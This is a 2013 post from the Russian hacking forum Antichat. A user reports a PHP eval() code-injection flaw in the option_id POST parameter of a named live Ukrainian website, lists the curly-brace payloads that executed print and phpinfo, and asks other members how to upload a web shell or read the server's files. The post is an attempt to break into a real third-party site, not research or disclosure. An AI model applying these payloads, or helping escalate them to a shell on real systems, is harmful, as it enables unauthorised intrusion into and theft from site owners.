HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.07.2013, 23:48
assmaday
Новичок
Регистрация: 03.02.2013
Сообщений: 13
С нами: 6985046

Репутация: 0
По умолчанию

Нашел уязвимость в POST параметре option_id на сайте

http://www. shans.com. ua/

HackBar'ом передаю POST запрос

option_id={${$print(1)}}{${$print(1)}}{${$print(1) }}

option_id={${$phpinfo()}}

Скрипт отрабатывает.... Данные передаются в eval()

Кавычки экранируются.... Как залить шелл или прочитать файлы... base64_encode() не срабатывает... пытался залить через curl_init()....

Непойму почему данные передаются в "{}" без ";"

Вот так не работает {${$a=1; $print($a);}...

А так выводит данные - {${$a=1}}{${$print($a)}}

в гугле не нашел как выглядит данный скрипт...

Если есть чтото подобное киньте ссылку...
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.